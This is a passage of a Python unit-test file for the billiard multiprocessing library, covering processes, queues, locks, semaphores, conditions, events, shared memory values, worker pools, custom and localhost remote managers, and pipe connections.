time it takes to finish"""
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
class BaseTestCase(object):
"""Base class for test cases"""
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
def get_value(self):
"""Return the value of a semaphore"""
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
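# Note: get_value() is called with a semaphore as 'self'; it first tries the
# object's own get_value() method, then falls back to the private value
# attributes used by various Semaphore implementations, and raises
# NotImplementedError if none of them exist.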
class _TestProcesses(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
return
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def _test(self, q, *args, **kwds):
current = self.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if self.TYPE != 'threads':
q.put(bytes(current.authkey, 'ascii'))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event() # noqa
args = (q, 1, 2)
kwargs = {'hello': 23, 'bye': 2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEquals(p.authkey, current.authkey)
self.assertEquals(p.is_alive(), False)
self.assertEquals(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEquals(p.exitcode, None)
self.assertEquals(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEquals(q.get(), args[1:])
self.assertEquals(q.get(), kwargs)
self.assertEquals(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEquals(q.get(), current.authkey)
self.assertEquals(q.get(), p.pid)
p.join()
self.assertEquals(p.exitcode, 0)
self.assertEquals(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
def _test_terminate(self):
time.sleep(1000)
def test_terminate(self):
if self.TYPE == 'threads':
return
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
p.terminate()
join = TimingWrapper(p.join)
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
# self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = billiard.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
def _test_recursion(self, wconn, id):
__import__('billiard.forking')
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = self.Process(
target=self._test_recursion, args=(wconn, id + [i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
class _UpperCaser(billiard.Process):
def __init__(self):
billiard.Process.__init__(self)
self.child_conn, self.parent_conn = billiard.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
def _test_put(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in the buffer but not yet in the pipe, so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(Queue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
def _test_get(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# ## Hangs unexpectedly, remove for now
# self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(Queue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(Queue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(Queue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
def _test_fork(self, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shut down until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(Queue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
return
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
def _test_task_done(self, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
if sys.version_info < (2, 5) and not hasattr(queue, 'task_done'):
self.skipTest("requires 'queue.task_done()' method")
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in xrange(4)]
for p in workers:
p.start()
for i in xrange(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# ## Currently fails on OS/X
# if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
return
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
def f(self, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in xrange(6):
sleeping.acquire()
# check they have all timed out
for i in xrange(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in xrange(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
class _TestEvent(BaseTestCase):
def _test_event(self, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear; this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
# self.assertEqual(event.is_set(), False)
self.Process(target=self._test_event, args=(event,)).start()
self.assertEqual(wait(), True)
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def _test(self, values):
for sv, cv in zip(values, self.codes_values):
sv.value = cv[2]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawvalue(self):
self.test_value(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock() # noqa
obj1 = val1.get_obj() # noqa
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock() # noqa
obj2 = val2.get_obj() # noqa
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock() # noqa
obj3 = val3.get_obj() # noqa
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def f(self, seq):
for i in range(1, len(seq)):
seq[i] += seq[i - 1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', range(10))
lock1 = arr1.get_lock() # noqa
obj1 = arr1.get_obj() # noqa
arr2 = self.Array('i', range(10), lock=None)
lock2 = arr2.get_lock() # noqa
obj2 = arr2.get_obj() # noqa
lock = self.Lock()
arr3 = self.Array('i', range(10), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj() # noqa
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(range(10))
self.assertEqual(a[:], range(10))
b = self.list()
self.assertEqual(b[:], [])
b.extend(range(5))
self.assertEqual(b[:], range(5))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2, 3, 4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], range(10))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = range(65, 70)
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((j, chr(j)) for j in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(z) for z in indices])
self.assertEqual(sorted(d.items()), [(x, chr(x)) for x in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
def sqr(x, wait=0.0):
time.sleep(wait)
return x * x
class _TestPool(BaseTestCase):
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x': 3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10)))
self.assertEqual(pmap(sqr, range(100), chunksize=20),
map(sqr, range(100)))
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except billiard.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 0.2))
get = TimingWrapper(res.get)
self.assertRaises(billiard.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, range(10))
self.assertEqual(list(it), map(sqr, range(10)))
it = self.pool.imap(sqr, range(10))
for i in range(10):
self.assertEqual(it.next(), i * i)
self.assertRaises(StopIteration, it.next)
it = self.pool.imap(sqr, range(1000), chunksize=100)
for i in range(1000):
self.assertEqual(it.next(), i * i)
self.assertRaises(StopIteration, it.next)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, range(1000))
self.assertEqual(sorted(it), map(sqr, range(1000)))
it = self.pool.imap_unordered(sqr, range(1000), chunksize=53)
self.assertEqual(sorted(it), map(sqr, range(1000)))
def test_make_pool(self):
p = billiard.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
if self.TYPE == 'manager':
# On Unix a forked process increfs each shared object to
# which its parent process held a reference. If the
# forked process gets terminated then there is likely to
# be a reference leak. So to prevent
# _TestZZZNumberOfObjects from failing we skip this test
# when using a manager.
return
self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertTrue(join.elapsed < 0.2)
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = billiard.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
countdown = 5
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [worker.pid for worker in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
class _TestZZZNumberOfObjects(BaseTestCase):
# Test that manager has expected number of shared objects left
# Because test cases are sorted alphabetically, this one will get
# run after all the other tests for the manager. It tests that
# there have been no "reference leaks" for the manager's shared
# objects. Note the comment in _TestPool.test_terminate().
ALLOWED_TYPES = ('manager',)
def test_number_of_objects(self):
EXPECTED_NUMBER = 1 # the pool object is still alive
billiard.active_children() # discard dead process objs
gc.collect() # do garbage collection
refs = self.manager._number_of_objects()
debug_info = self.manager._debug_info()
if refs != EXPECTED_NUMBER:
print(self.manager._debug_info())
print(debug_info)
self.assertEqual(refs, EXPECTED_NUMBER)
# Test of creating a customized manager class
from billiard.managers import BaseManager, BaseProxy, RemoteError # noqa
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in xrange(10):
yield i * i
class IteratorProxy(BaseProxy):
_exposed_ = ('next', '__next__')
def __iter__(self):
return self
def next(self):
return self._callmethod('next')
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i * i for i in range(10)])
manager.shutdown()
_queue = Queue.Queue()
# Test of connecting to a remote server and using xmlrpclib for serialization
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def _putter(self, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
queue.put(('hello world', None, True, 2.25))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
self.assertEqual(queue.get(), ['hello world', None, True, 2.25])
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
def _putter(self, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER)
addr = manager.get_server().address
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.start()
manager.shutdown()
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _echo(self, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', range(4))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0] * 10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0] * 10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except billiard.BufferTooShort as exc:
self.assertEqual(exc.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(IOError, reader.send, 2)
self.assertRaises(IOError, writer.recv)
self.assertRaises(IOError, writer.poll)
